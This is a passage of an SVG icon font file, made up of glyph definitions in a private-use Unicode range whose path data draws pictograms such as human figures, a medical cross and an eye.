25.935v-156.167h-392.376v496.767h392.376v-255.203l25.935-25.921v307.082h-444.138v-548.737zM294.978 812.879c19.329 0 35.005 15.695 35.005 35.009 0 19.296-15.676 35.005-35.005 35.005-19.291 0-34.972-15.709-34.972-35.005 0-19.314 15.671-35.009 34.972-35.009zM410.572 667.386c0 0-28.724 97.554-28.762 97.639-11.434 37.964-43.47 36.826-43.47 36.826h-86.653c0 0-32.079 1.137-43.508-36.826-0.038-0.090-28.724-97.639-28.724-97.639-2.345-7.928 2.208-16.209 10.117-18.536 1.416-0.392 2.827-0.609 4.214-0.609 6.455 0 12.392 4.214 14.327 10.735l27.421 93.359 0.071-0.033 12.222 0.033v-106.236l-48.27-165.661c-3.171-10.877 3.044-22.231 13.916-25.407 1.935-0.557 3.832-0.831 5.729-0.831 8.876 0 17.068 5.8 19.692 14.742l47.68 163.59h16.884l47.675-163.59c2.586-8.947 10.773-14.742 19.645-14.742 1.897 0 3.827 0.278 5.766 0.831 10.853 3.176 17.097 14.534 13.921 25.407l-48.274 165.591v106.307l12.222-0.033 0.071 0.033 27.455-93.359c1.897-6.522 7.871-10.735 14.298-10.735 1.406 0 2.827 0.208 4.214 0.609 7.914 2.326 12.434 10.613 10.122 18.536zM862.062 682.104c-36.218 0-65.711 29.413-65.711 65.706 0 36.326 29.493 65.777 65.711 65.777 36.42 0 65.692-29.451 65.692-65.777 0-36.293-29.276-65.706-65.692-65.706zM862.062 584.324c0 0 15.945-2.057 25.713 11.462 8.838 12.359 9.49 53.281 9.56 60.694h-70.599c-0.241-29.46 3.181-50.926 10.221-61.737 7.111-11.042 25.105-10.419 25.105-10.419zM575.606 526.353c-2.421-3.969-6.182-12.028-6.182-17.125 0-15.365 12.392-27.69 27.714-27.69h91.155c10.353 0 23.958 4.172 29.762 12.878 19.602 29.106 40.323 59.774 46.434 68.952v-172.358h229.565v176.746c0 46.231-36.118 87.837-78.829 87.837 0.104-21.702-2.803-57.731-15.506-73.506-13.26-16.11-28.884-14.709-28.884-14.709v-67.244c8.315-3.435 14.185-11.599 14.185-21.136 0-12.67-10.249-22.92-22.957-22.92-12.675 0-22.891 10.249-22.891 22.92 0 9.518 5.795 17.682 14.081 21.136v67.551c0 0-13.633-1.123-26.515 11.793-17.196 17.918-17.847 68.707-17.804 77.012h-4.181c-29.418 0-55.244-15.1-70.161-37.529l-54.579-82.349-82.802 0.033-116.934 116.944c-4.384 4.422-11.533 4.422-15.917 0-4.422-4.379-4.45-11.528-0.033-15.945l111.281-111.29z" horiz-adv-x="1033" />
<glyph unicode="&#xe63a;" d="M924.245 563.475v-604.625h-359.614v605.582h76.098l-75.662 60.151 41.842 56.292 68.039-49.484-30.056 98.152 65.621 20.385 33.858-103.974h0.152l34.039 103.974 65.631-20.385-30.236-98.152 65.631 48.526 41.813-56.292-73.225-59.193h76.070v-0.958zM856.623 492.601h-76.089v-96.066h76.089v96.066zM708.257 492.601h-76.098v-96.066h76.098v96.066zM856.623 325.86h-76.089v-296.154h76.089v296.154zM708.257 325.86h-76.098v-296.154h76.098v296.154zM354.721 412.776h100.333v-352.673c-30.142-3.954-30.142-48.119 0.806-52.063v-52.053h-252.425c-42.079 0-78.459 37.139-78.459 82.536v284.397c0 28.89 10.961 50.11 41.244 64.825 0 0 188.482 83.873 188.719 84.186l-0.218-59.155zM378.169 52.565h-176.156c-27.515 0-27.61-38.817-0.114-38.817h177.882c-12.942 8.268-13.739 29.734-1.612 38.817zM398.535 355.518h-43.814v-198.116l-110.383-49.531h154.197v247.647zM380.852 786.593l16.612-25.268c101.907 66.968 488.998 61.781 492.895 61.715l0.484 30.246c-16.299 0.256-400.356 5.367-509.99-66.693zM272.972 741.869c0 0-39.699-41.263-88.671-41.263-48.981 0-88.68 18.479-88.68 41.263 0 22.803 39.699 41.263 88.68 41.263 48.972 0 88.671-41.263 88.671-41.263zM343.305 741.869c0 0 39.708-41.263 88.671-41.263 48.991 0 88.69 18.479 88.69 41.263 0 22.803-39.699 41.263-88.69 41.263-48.962 0-88.671-41.263-88.671-41.263zM283.913 718.545c0 0 1.138-57.278-33.489-91.913-34.636-34.617-75.776-49.626-91.904-33.498s-1.119 57.249 33.517 91.885c34.617 34.636 91.876 33.527 91.876 33.527zM333.653 768.275c0 0 57.259-1.138 91.885 33.498 34.626 34.617 49.617 75.757 33.489 91.885-16.1 16.119-57.23 1.119-91.876-33.527-34.607-34.617-33.498-91.857-33.498-91.857zM308.148 709.755c0 0 41.292-39.727 41.292-88.68 0-48.972-18.489-88.68-41.292-88.68-22.793 0-41.244 39.708-41.244 88.68-0.038 48.962 41.244 88.68 41.244 88.68zM308.148 780.089c0 0 41.292 39.708 41.292 88.661 0 48.981-18.489 88.68-41.292 88.68-22.793 0-41.254-39.708-41.244-88.68-0.038-48.953 41.244-88.661 41.244-88.661zM331.482 720.697c0 0 57.268 1.119 91.895-33.498 34.626-34.645 49.636-75.776 33.508-91.913-16.119-16.119-57.259-1.109-91.876 33.527-34.636 34.617-33.527 91.885-33.527 91.885zM281.742 770.437c0 0 1.128 57.24-33.489 91.895-34.645 34.617-75.767 49.607-91.913 33.479-16.090-16.1-1.109-57.249 33.536-91.876 34.607-34.607 91.866-33.498 91.866-33.498z" />
<glyph unicode="&#xe63b;" d="M553.829 840.361c30.476 0 55.23 24.75 55.23 55.226 0 30.443-24.754 55.226-55.23 55.226-30.48 0-55.193-24.778-55.193-55.226 0.005-30.476 24.712-55.226 55.193-55.226zM254.224 839.999c-30.992 0-56.019 24.886-56.019 55.62 0 30.697 25.027 55.587 56.019 55.587 30.95 0 56.057-24.891 56.057-55.587 0-30.734-25.107-55.62-56.057-55.62zM866.924 665.586c0-21.397-17.346-38.743-38.743-38.743s-38.743 17.346-38.743 38.743c0 21.397 17.346 38.743 38.743 38.743 21.397 0 38.743-17.346 38.743-38.743zM884.304 607.73c-13.636 0-91.296 0-104.533 0-0.474 0-34.948 3.138-34.948 3.138l-43.745 152.585c-17.638 61.398-69.115 59.519-69.115 59.519h-141.697c0 0-51.43 1.879-69.073-59.519l-21.57-75.142-21.57 75.142c-17.676 61.398-69.073 59.519-69.073 59.519h-109.629c0 0-51.472 1.879-69.078-59.519l-44.145-153.736c-4.19-14.392 3.683-25.328 16.267-28.968 12.551-3.607 25.393 2.738 28.639 14.214l42.961 149.842 20.954 0.033-62.727-259.471h55.437v-184.287c0-15.191 12.222-27.535 27.446-27.535 15.186 0 27.596 12.344 27.596 27.535v184.287h23.228v-184.287c0-15.191 12.265-27.535 27.446-27.535 15.224 0 27.596 12.344 27.596 27.535v184.292h54.507l-62.116 259.471 20.879-0.033 42.463-148.292c0.681-2.522 1.832-4.796 3.316-6.858 4.185-6.243 11.428-9.775 19.555-9.521 8.075-0.254 15.294 3.208 19.442 9.413 1.729 2.245 2.922 4.801 3.607 7.652l42.275 147.606 19.301 0.033c0 0 0-411.949 0-438.422 0-17.887 14.637-32.392 32.533-32.392 17.897 0 32.392 14.505 32.392 32.392 0 26.488 0 249.443 0 249.443h23.951c0 0 0-222.955 0-249.443 0-17.887 14.5-32.392 32.359-32.392 17.925 0 32.613 14.505 32.613 32.392 0 26.488 0 438.422 0 438.422l20.945-0.033 41.171-149.842c2.165-7.398 8.361-12.269 15.755-14.111 0.291-0.075 0.47-0.291 0.756-0.324 6.539-1.48 36.718-10.029 58.974-16.375 0-40.471 0-255.028 0-271.91 0-12.56 10.278-22.768 22.8-22.768 12.556 0 22.763 10.207 22.763 22.768 0 18.615 0 135.844 0 135.844h17.812c0 0 0-117.229 0-135.844 0-12.56 10.174-22.768 22.725-22.768 12.556 0 22.871 10.207 22.871 22.768 0 18.615 0 253.98 0 253.98h17.497c0 0 0-75.208 0-86.105 0-9.376 7.647-17.028 16.952-17.028 9.376 0 16.732 7.647 16.732 17.028 0 9.348 0 83.977 0 97.942 0.014 27.404-24.083 49.664-51.501 49.664zM765.774 68.876c-10.672 8.267-21.391 16.807-32.242 25.473-9.019 7.177-18.080 14.43-27.192 21.537-54.577 42.642-111.315 81.516-174.479 87.186-5.237 0.47-10.498 0.756-15.802 0.756-5.341 0-10.569-0.681-15.802-1.156-63.338-5.74-120.297-44.403-175.010-87.19 1.916-1.513 3.824-3.034 5.74-4.547 6.675-5.298 13.204-10.39 19.804-15.581 54.399 42.177 107.459 76.908 165.277 76.908 57.607 0 110.522-34.553 164.737-76.546 10.963-8.446 21.969-17.206 33.036-26.084 8.76-6.961 17.568-13.993 26.403-20.912 59.336-46.39 121.231-88.524 191.065-88.524 27.056 0 52.882 6.459 77.843 16.919v34.482c-25.318-12.194-51.078-19.841-77.843-19.841-57.865 0-110.987 34.844-165.536 77.119zM740.277 115.266c1.808-1.442 3.645-2.884 5.449-4.331 6.755-5.411 13.42-10.531 20.095-15.83 19.724 15.261 39.316 29.508 58.974 41.514v-84.837c10.531-6.891 21.062-13.274 31.598-18.648v120.447c19.479 9.094 39.246 15.327 59.481 17.497v-157.132c4.871-0.578 9.742-1.118 14.646-1.118 5.665 0 11.325 0.54 16.952 1.296v157.17c21.030-2.269 41.481-8.944 61.684-18.61v34.412c-24.848 10.357-50.575 16.732-77.481 16.732-69.876 0-131.918-42.134-191.399-88.562zM291.342 48.353c-2.090 1.663-4.228 3.316-6.313 5.012-6.459 5.158-12.805 10.066-19.226 15.149-54.324-42.092-107.351-76.758-165.057-76.758-26.582 0-52.163 8.075-77.368 20.95v-34.802c24.816-10.968 50.463-17.713 77.368-17.713 69.646 0 131.401 41.918 190.596 88.163zM84.621 13.866c5.233-0.686 10.498-1.188 15.764-1.188 5.298 0 10.564 0.503 15.834 1.188v157.424c20.381-2.203 40.255-8.441 59.885-17.676-0.113-0.719-0.432-1.414-0.432-2.203v-117.849c10.498 5.444 21.030 11.795 31.598 18.719v84.292c30.194-18.54 60.167-42.383 90.901-66.912 67.448-53.812 137.202-109.474 217.506-109.474 69.58 0 131.373 41.806 190.638 87.975-2.17 1.724-4.368 3.457-6.539 5.195-6.421 5.082-12.692 9.953-19.010 14.97-19.371-14.97-38.56-28.86-57.851-40.725v83.47c-10.574 6.961-21.105 13.312-31.608 18.761v-117.271c0-0.653 0.291-1.193 0.366-1.804-19.592-9.235-39.462-15.581-59.805-17.826v156.954c-5.519 0.756-11.001 1.264-16.525 1.264-5.045 0-10.066-0.54-15.078-1.156v-157.353c-20.447 2.17-40.359 8.366-59.984 17.572 0.108 0.789 0.465 1.513 0.465 2.344v118.032c-10.527-5.378-21.058-11.762-31.594-18.69v-84.691c-30.335 18.573-60.416 42.491-91.3 67.128-67.452 53.816-137.174 109.479-217.431 109.479-26.765 0-52.304-5.956-77.044-15.576v-34.088c20.057 8.906 40.359 15.116 61.247 17.206v-157.494h-0.005z" />
<glyph unicode="&#xe63c;" d="M997.141 633.306h-310.601v310.601h-357.442v-310.601h-310.601v-357.432h310.601v-310.61h357.442v310.61h310.601z" horiz-adv-x="1015" />
<glyph unicode="&#xe63d;" d="M494.377 154.374c-10.983 10.983-28.803 10.983-39.772 0l-132.451-132.353-16.487 16.478 177.592 177.362c10.974 10.979 10.974 28.789 0 39.754-10.941 11.016-28.761 11.016-39.772 0.042l-177.559-177.39-16.454 16.454 206.553 206.38c10.974 10.979 11.012 28.789 0.033 39.768-10.974 11.007-28.794 11.007-39.758 0.033l-206.591-206.376-16.454 16.478 162.115 161.979c10.974 10.974 10.974 28.756 0 39.768-10.946 10.974-28.761 11.007-39.768 0l-208.555-208.157c-0.131 20.157-0.299 56.418-0.299 89.144 0 45.467-57.452 52.205-60.318 49.035-2.805-3.301-31.463-319.077-31.463-319.077h328.826l18.315 18.32-0.234 0.201 132.493 132.381c10.988 10.983 10.988 28.77 0.009 39.777zM642.343 928.597c-166.276 0-319.479-124.741-351.41-262.102-7.145-30.626-15.154-110.368-15.154-110.368l-76.393-192.54c-1.501-3.535-2.296-7.374-2.296-11.54 0-16.22 13.204-29.458 29.523-29.458h26.086l46.58 46.538c20.050 19.98 52.481 19.98 72.494-0.037 7.374-7.411 12.003-16.51 13.943-26.086l14.252 14.242c20.017 20.017 52.444 20.017 72.466-0.037 19.615-19.61 19.849-51.139 1.001-71.226 9.613-1.903 18.787-6.569 26.222-14.013 19.984-20.012 19.984-52.472-0.033-72.456l-14.878-14.846c9.543-1.931 18.619-6.565 25.993-13.939 20.012-20.022 20.012-52.491 0-72.508l-33.035-32.992v-101.526h391.149v310.838c85.146 66.962 140.021 171.055 140.021 287.833 0 202.308-164.013 366.223-366.531 366.223zM366.026 482.998c-22.626 0-40.932 18.348-40.932 40.866 0 22.622 18.315 40.904 40.932 40.904 22.584 0 40.838-18.282 40.838-40.904 0.005-22.523-18.254-40.866-40.838-40.866zM557.332 387.738c10.212 0 18.652-8.374 18.652-18.549 0-10.305-8.444-18.614-18.652-18.614-10.277 0-18.614 8.309-18.614 18.614 0 10.175 8.337 18.549 18.614 18.549zM546.222 271.437c-10.24 0-18.586 8.342-18.586 18.619 0 10.245 8.342 18.647 18.586 18.647 10.277 0 18.647-8.407 18.647-18.647 0.005-10.277-8.365-18.619-18.647-18.619zM585.962 191.341c-15.491 1.333-26.792 14.818-25.563 30.201 1.365 15.337 14.888 26.689 30.234 25.385 15.309-1.305 26.722-14.841 25.352-30.121-1.333-15.421-14.808-26.797-30.023-25.464zM612.782 302.905c-15.575 0-27.952 12.475-27.952 27.858s12.372 27.821 27.952 27.821c15.285 0 27.727-12.442 27.727-27.821s-12.447-27.858-27.727-27.858zM652.349 244.523c-10.338 0-18.713 8.295-18.713 18.633 0 10.179 8.374 18.549 18.713 18.549 10.287 0 18.596-8.37 18.596-18.549-0.005-10.334-8.309-18.633-18.596-18.633zM693.959 352.712h-6.509v33.226l6.439 0.065c41.46 0.070 75.299 33.829 75.435 75.271-0.131 41.437-33.974 75.201-75.402 75.271l-6.471 0.033v33.203h6.509c59.916 0 108.628-48.642 108.628-108.497 0-59.855-48.712-108.572-108.628-108.572z" horiz-adv-x="1019" />
<glyph unicode="&#xe63e;" d="M513.898 413.142c75.593 0 110.662-57.391 118.047-138.865 1.747-19.498-0.085-47.926-2.583-80.844-8.497-109.371-18.268-243.778 54.563-243.778 61.586 0 93.231 118.173 111.494 252.867 17.629 133.341-1.033 199.699 8.131 258.898 17.511 112.18 115.435 212.752 85.18 355.793-16.755 79.341-60.439 116.666-103.72 132.345-99.704 36.291-164.075-33.632-271.13-33.632-107.050 0-171.421 69.923-271.163 33.632-43.243-15.679-86.923-53.008-103.715-132.345-30.217-143.031 67.669-243.613 85.217-355.793 9.174-59.204-9.488-125.557 8.14-258.898 18.258-134.703 49.904-252.867 111.489-252.867 72.789 0 63.065 134.407 54.568 243.778-2.499 32.909-4.336 61.346-2.588 80.844 7.365 81.474 42.905 138.865 118.070 138.865z" />
<glyph unicode="&#xe63f;" d="M806.539 726.978c-2.737 0-5.455-0.067-8.163-0.182v0.144h-564.329v-371.923c0-55.621 45.085-100.735 100.725-100.735h362.86c55.621 0 100.735 45.113 100.735 100.735v26.49c2.689-0.115 5.407-0.201 8.144-0.201 99.184 0 179.583 74.647 179.583 173.793 0.019 99.175-80.379 171.879-179.554 171.879zM806.539 449.761c-2.737 0-5.455 0.144-8.163 0.335v208.877c2.68 0.153 5.417 0.287 8.163 0.287 60.091 0 108.822-44.061 108.822-104.17s-48.712-105.328-108.822-105.328zM1005.932 232.568v-3.484c0-55.621-45.113-100.735-100.725-100.735h-783.781c-55.631 0-100.725 45.113-100.725 100.735v3.484h985.232z" />
<glyph unicode="&#xe640;" d="M634.396 393.737v309.802l-119.15 248.733-119.028-248.733v-309.802l-241.664-116.717v-321.113h286.654v154.849c0 79.407 71.873 105.411 71.873 105.411s71.854-26.004 71.854-105.411v-154.849h291.229v321.113l-241.767 116.717zM555.919 520.272h-81.648v65.55c0 65.747 40.81 87.289 40.81 87.289s40.838-21.546 40.838-87.289v-65.55z" horiz-adv-x="1019" />
<glyph unicode="&#xe641;" d="M10.602 308.633h824.63v-64.916h-824.63v64.916zM623.4 133.355c0 43.257-190.483 38.926-190.483-0.582 0-6.224 0-132.852 0-146.418-1.898-20.165 12.744-39.941 32.984-39.941 15.073 0 510.201-0.038 510.201-0.038 20.278 0 36.695 16.384 36.695 36.667 0 0 0.047 462.857 0.047 463.581 0 291.29-250.025 525.42-546.83 498.425-20.17-1.855-35.070-19.658-33.247-39.866 0-13.429 0-157.766 0-157.766h190.633v111.748c182.23-48.87 315.998-215.233 316.068-412.4-0.653-197.040-133.764-364.168-316.068-412.78v99.37zM687.635 445.539c0 45.408 36.77 82.145 82.136 82.145 45.296 0 82.207-36.747 82.207-82.145 0-45.249-36.911-82.169-82.207-82.169-45.366-0.005-82.136 36.92-82.136 82.169zM582.59 530.564h-275.216l-297.425-45.521v-121.56l216.341-0.038c-6.557 10.597-10.522 22.979-10.522 36.305 0 38.325 31.204 69.491 69.51 69.491h150.735l122.152 25.52 6.806-32.439-125.539-26.215h-154.154c-20.067 0-36.343-16.262-36.343-36.366 0-19.912 16.022-36.047 35.863-36.3l298.402-0.042c46.169 0.366 83.198 37.536 83.198 83.475 0.005 46.174-37.348 83.691-83.808 83.691z" horiz-adv-x="1019" />
<glyph unicode="&#xe642;" d="M641.066 630.824c0-72.905-59.186-132.007-132.166-132.007-72.9 0-131.988 59.102-131.988 132.002s59.088 132.007 131.988 132.007c72.975 0.005 132.166-59.102 132.166-132.002zM509.115 951.612c-61.089 0-146.413-24.352-208.232-86.152l73.41-133.747c31.407 39.861 80.12 65.438 134.822 65.438 55.347 0 104.598-26.142 135.968-66.798l72.007 138.179c-53.486 58.452-149.401 83.080-207.975 83.080zM563.527 853.41h-34.171v-34.138h-41.063v34.138h-34.171v41.039h34.171v34.283h41.063v-34.283h34.171v-41.039zM335.456 261.585h33.811l-48.282-165.5h377.3l-48.067 165.5h33.843l48.362-165.5h111.022l-75.776 250.754c-11.844 41.4-63.75 114.267-153.31 116.474l-205.927 0.178c-91.604-0.444-144.59-74.747-156.578-116.647l-77.244-250.754h112.598l48.25 165.495zM15.159 43.31h987.683v-93.974h-987.683v93.974z" horiz-adv-x="1019" />
<glyph unicode="&#xe643;" d="M261.382 544.815c-97.45-54.979-157.991-158.541-157.991-270.318 0-82.829 32.275-160.73 90.845-219.3 58.58-58.58 136.462-90.836 219.309-90.836 144.043 0 268.063 97.696 301.607 237.579l-53.065 12.726c-27.641-115.236-129.829-195.743-248.542-195.743-68.283 0-132.454 26.599-180.733 74.869-48.27 48.28-74.85 112.45-74.85 180.705 0 92.105 49.9 177.464 130.227 222.787l-26.807 47.531zM893.243 161.147l-56.903-22.752-153.073 286.171h-312.419l-10.243 94.275 241.237-0.114 0.009 54.581-247.159 0.095-22.515 207.484c10.044-2.54 20.657-3.402 31.555-2.104 47.616 5.695 81.568 48.905 75.873 96.521-5.704 47.597-48.886 81.568-96.502 75.873-47.607-5.695-81.568-48.905-75.883-96.502 0.824-6.927 2.53-13.532 4.842-19.786l-0.616-0.066 47.787-440.486 2.653-24.344h328.689l160.692-300.385 102.245 40.888-20.269 50.649z" horiz-adv-x="1016" />
<glyph unicode="&#xe644;" d="M84.814 161.167c-71.055 0-76.546 76.546-76.546 76.546v479.847h941.206c0 0 70.928 3.269 70.928-62.018 0-68.636-61.337-64.883-61.337-64.883h-251.26c-6.322 2.353-12.978 4.063-19.959 4.913l-205.561 25.957-227.225 65.494c-7.262 2.109-14.801-2.081-16.915-9.315-2.081-7.267 2.010-15.177 9.244-17.3l231.786-66.823c15.999-4.575 29.203-15.149 37.282-29.715 8.051-14.538 9.963-31.317 5.36-47.25-4.575-15.928-15.116-29.165-29.71-37.244-14.435-7.99-31.147-9.897-46.972-5.425-0.103 0.033-0.202 0.033-0.338 0.033l-97.491 28.277c-50.594 15.863-88.252-0.070-128.225-16.919-30.767-12.993-62.563-26.37-105.749-29.306-5.284-0.343-10.846-0.681-17.361-0.644-7.61 0.070-13.782-5.998-13.815-13.505-0.103-7.577 6.243-14.19 13.815-14.19 57.959 0.038 98.318 17.089 133.928 32.129 38.137 16.102 68.256 28.827 109.399 15.9 0.103-0.038 8.596-2.494 20.494-5.904-27.319-12.589-47.719-38.47-51.745-70.365-4.646-36.639 13.575-70.99 43.454-88.693-18.728-12.758-32.167-33.097-35.201-57.269-5.627-44.582 26.089-88.008 70.675-92.338-0.005 0.009-231.109 0.009-302.16 0.009zM828.378 219.427h124.505v31.284h-124.505v-31.284zM875.083 402.982v-46.052h-46.7v-31.321h46.7v-45.53h31.274v45.53h46.522v31.321h-46.522v46.052h-31.274zM890.702 157.212c-76.344 0-113.561 62.29-113.561 117.718 0 81.497 113.561 261.674 113.561 261.674s113.523-180.177 113.523-261.674c0-55.432-37.151-117.718-113.523-117.718zM738.356 498.566c-4.336-34.046-35.521-58.298-69.59-53.929l-150.669 18.972c14.566 11.532 25.135 27.216 30.358 45.399 6.614 23.026 3.885 47.278-7.774 68.293-1.874 3.373-4.002 6.651-6.243 9.719l149.955-18.897c34.041-4.307 58.26-35.511 53.962-69.557zM665.53 354.37c-2.081-16.483-10.475-31.18-23.608-41.383-13.166-10.165-29.466-14.698-45.977-12.589l-206.486 26.027c-34.074 4.298-58.26 35.521-53.962 69.562 2.081 16.473 10.47 31.185 23.604 41.345 13.176 10.235 29.471 14.698 45.953 12.622l206.514-26.056c34.041-4.298 58.26-35.483 53.962-69.529zM569.194 221.611c-3.72-29.438-30.725-50.378-60.172-46.686l-118.606 14.965c-29.405 3.725-50.378 30.739-46.662 60.176 3.72 29.409 30.734 50.345 60.172 46.639l118.573-14.947c27.188-3.438 47.104-26.671 47.104-53.347 0-2.264-0.103-4.514-0.409-6.802z" />
<glyph unicode="&#xe645;" d="M322.086 403.513v-444.805h-207.199v991.81h207.199v-375.723h386.769v375.723h207.208v-991.81h-207.208v444.805h-386.769z" />
<glyph unicode="&#xe646;" d="M515.025 678.381c77.152 0 139.663 62.511 139.663 139.574 0 77.124-62.516 139.607-139.663 139.607-77.096 0-139.635-62.478-139.635-139.607 0-77.063 62.544-139.574 139.635-139.574zM699.265 635.848c98.849 0 179.764-80.093 179.764-178.852 0-50.284 0-399.238 0-432.983 0-33.783-26.568-61.172-60.355-61.172-33.75 0-61.102 27.39-61.102 61.172 0 39.349 0 390.355 0 390.355h-51.134v-472.614h-380.674v472.614h-50.627c0 0 0-351.007 0-390.355 0-33.783-27.291-61.172-61.069-61.172-33.712 0-60.327 27.39-60.327 61.172 0 33.75 0 382.704 0 432.983 0 98.755 88.12 178.852 186.936 178.852 47.799 0 309.572 0 358.588 0zM464.671 129.973c-4.711 4.956-7.234 10.625-6.797 21.072 0.409 9.357 3.791 13.833 8.582 18.141 9.291 8.389 12.499 24.318 12.499 37.367 0 25.713-22.058 46.451-49.528 46.451-23.125 0-44.234-20.799-51.228-34.187-5.369-10.729-12.509-32.279-13.321-57.522-0.789-23.806 3.518-43.074 9.15-62.567 7.685-21.227 28.418-45.366 55.399-45.366 27.47 0 49.528 20.799 49.528 46.46 0 4.373-0.305 8.131-1.982 12.509-1.503 4.392-7.929 12.997-12.302 17.643zM555.769 112.316c-1.606-4.378-2.076-8.14-2.076-12.509 0-25.652 22.265-46.46 49.692-46.46 26.845 0 47.719 24.149 55.474 45.361 5.637 19.503 9.869 38.766 9.014 62.572-0.747 25.238-8.023 46.794-13.284 57.518-6.957 13.392-28.137 34.187-51.195 34.187-27.427 0-49.692-20.738-49.692-46.451 0-13.044 3.448-28.973 12.706-37.367 4.744-4.303 8.131-8.779 8.572-18.136 0.343-10.451-2.222-16.126-6.792-21.077-4.491-4.627-10.813-13.232-12.42-17.638z" horiz-adv-x="1029" />
<glyph unicode="&#xe647;" d="M509.975 156.024c-198.661 0-382.78 99.234-492.479 265.45l-5.667 8.594 5.667 8.589c109.811 166.22 293.879 265.454 492.479 265.454 198.595 0 382.667-99.249 492.343-265.454l5.672-8.589-5.672-8.519c-109.676-166.295-293.748-265.525-492.343-265.525v0zM512.43 282.379c39.454 0 76.59 15.393 104.537 43.265 27.929 27.919 43.27 65.059 43.27 104.546s-15.351 76.566-43.27 104.546c-27.943 27.919-65.087 43.265-104.537 43.265-39.492 0-76.622-15.351-104.532-43.265-27.858-27.98-43.246-65.059-43.246-104.546 0.005-81.471 66.247-147.811 147.779-147.811zM947.915 430.059c-79.072 109.652-194.251 184.39-323.715 212.3 76.019-40.114 128.075-119.92 128.075-211.706 0-63.956-24.969-124.105-70.146-169.329-18.17-18.137-38.73-32.819-61.033-44.13 130.74 27.419 247.079 102.386 326.82 212.866zM408.352 215.407c-23.678 11.507-45.594 26.788-64.779 45.916-45.29 45.224-70.221 105.374-70.221 169.329 0 63.937 24.931 124.077 70.221 169.297 18.058 18.044 38.66 32.791 60.902 44.032-133.012-26.395-251.637-101.82-332.538-213.922 81.696-113.164 201.878-188.958 336.414-214.652zM461.169 421.872c26.956 0 48.839 21.845 48.839 48.839s-21.883 48.876-48.839 48.876c-26.993 0-48.843-21.883-48.843-48.876 0.009-26.993 21.855-48.839 48.843-48.839z" horiz-adv-x="1019" />
<glyph unicode="&#xe648;" d="M890.474 955.069h-751.989c-73.686 0-133.63-59.944-133.63-133.667v-751.946c0-73.723 59.944-133.667 133.63-133.667h751.989c73.686 0 133.663 59.944 133.663 133.667v751.946c0 73.723-59.977 133.667-133.663 133.667zM514.652 845.515c54.196 0 98.191-43.603 98.191-97.389 0-53.81-43.99-97.412-98.191-97.412-54.187 0-98.186 43.603-98.186 97.412 0.005 53.786 43.994 97.389 98.186 97.389zM780.345 196.568c-21.981-6.304-44.461 4.79-50.294 24.911l-75.153 262.465-36.671 0.057 120.167-418.774h-447.705l120.171 418.774-36.718-0.057-75.181-262.465c-5.757-20.131-28.257-31.215-50.218-24.911-22.009 6.304-35.887 25.548-28.507 50.681l77.343 269.274c30.885 107.643 120.969 104.269 120.969 104.269h192.002c0 0 90.084 3.374 121.002-104.269l77.281-269.274c7.376-25.133-6.507-44.376-28.488-50.681zM515.129 435.198c-66.555 0-120.497-53.918-120.497-120.45 0-60.468 44.542-110.55 102.636-119.176v-33.042h-36.251v-36.081h36.251v-36.203h36.057v36.203h36.227v36.081h-36.227v33.098c57.953 8.763 102.254 58.783 102.254 119.119 0 66.532-53.894 120.45-120.45 120.45zM514.52 232.318c-46.424 0-84.034 37.638-84.034 84.058 0 46.396 37.61 84.058 84.034 84.058 46.453 0 84.053-37.661 84.053-84.058 0.005-46.42-37.6-84.058-84.053-84.058z" />
<glyph unicode="&#xe649;" d="M222.446 814.83c-44.303 0-80.302-36.074-80.302-80.344 0-44.327 36.004-80.349 80.302-80.349 44.275 0 80.363 36.022 80.363 80.349 0 44.266-36.083 80.344-80.363 80.344zM275.68 745.264l-52.687-24.899c-2.385-1.094-5.288-0.987-7.673 0.575-2.001 1.286-3.259 3.315-3.591 5.536l-0.108 62.039c0 4.447 3.614 8.038 8.028 8.038 4.437 0 8.028-3.591 8.028-8.038v-48.133l41.152 19.381c3.974 1.917 8.795 0.192 10.684-3.806 1.889-4.035 0.164-8.805-3.834-10.694zM885.232 949.227h-745.14c-73.017 0-132.414-59.397-132.414-132.442v-745.061c0-73.041 59.401-132.47 132.414-132.47h745.14c73.017 0 132.409 59.429 132.409 132.47v745.061c0.005 73.045-59.392 132.442-132.409 132.442zM556.238 818.047c41.755 0 75.617-33.834 75.617-75.645 0-41.783-26.629-75.645-75.617-75.645-41.783 0-75.673 33.862-75.673 75.645 0 41.806 33.89 75.645 75.673 75.645zM360.916 465.675l38.767 114.552c10.362 28.466 36.471 61.973 75.678 61.973h161.727c39.211 0 65.321-33.507 75.678-61.973l38.776-114.552c3.727-12.728-0.299-26.54-11.259-34.32-5.129-3.642-12.031-6.083-17.894-6.083-6.873 0-13.78 2.329-18.628 5.747l-104.387 73.326c-12.657 8.94-15.669 26.442-6.733 39.104 8.931 12.653 26.404 15.673 39.090 6.747l61.099-46.183c3.647-2.717 8.795-1.973 11.563 1.669 1.099 1.506 2.993 6.85-1.665 11.535 0 0-32.796 24.66-48.413 36.415v68.931l-98.061-15.973-98.066 15.973v-68.931c-15.612-11.76-48.437-36.415-48.437-36.415-4.662-4.685-2.74-10.030-1.646-11.535 2.768-3.642 7.916-4.381 11.535-1.669l61.127 46.183c12.657 8.926 30.131 5.906 39.090-6.747 8.935-12.667 5.924-30.164-6.733-39.104l-104.387-73.326c-4.849-3.427-11.755-5.747-18.661-5.747-5.835 0-12.76 2.441-17.862 6.083-10.974 7.781-15.028 21.593-11.297 34.32zM684.654 424.336l-208.335 34.278 29.892 21.284 50.026-6.93 49.975 6.93 78.441-55.563zM115.731 734.458c0 58.882 47.866 106.767 106.716 106.767s106.772-47.885 106.772-106.767c0-58.882-47.918-106.744-106.772-106.744-58.85 0-106.716 47.866-106.716 106.744zM555.307 143.040h-245.839c-13.237 0-23.949 10.74-23.949 23.973v215.353c0 13.176 10.712 23.917 23.949 23.917h47.918c13.204 0 23.945-10.74 23.945-23.917v-119.621h173.977v-119.705zM657.665 88.576c0-22.795-18.493-41.259-41.292-41.259-22.795 0-41.315 18.465-41.315 41.259v182.8c0 22.766 18.521 41.287 41.315 41.287 22.799 0 41.292-18.521 41.292-41.287v-182.8zM640.243 324.124l-180.36 29.724c-22.495 3.699-37.724 24.983-34.026 47.473 3.727 22.495 24.959 37.696 47.45 34.030l180.36-29.747c22.519-3.652 37.724-24.931 34.026-47.431-3.699-22.514-24.955-37.696-47.45-34.049zM828.056 167.013c0-13.233-10.768-23.973-23.945-23.973h-126.635v119.705h54.772v119.621c0 13.176 10.745 23.917 23.917 23.917h47.946c13.176 0 23.945-10.74 23.945-23.917v-215.353z" horiz-adv-x="1019" />
